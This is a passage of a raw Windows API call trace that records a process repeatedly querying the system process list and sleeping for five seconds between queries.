[0121.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.202] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.217] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.233] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.248] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.265] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.283] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.294] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.314] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.334] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.341] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.361] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.374] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.389] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.405] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.421] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.435] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.450] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.476] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.483] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.497] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.518] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.529] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 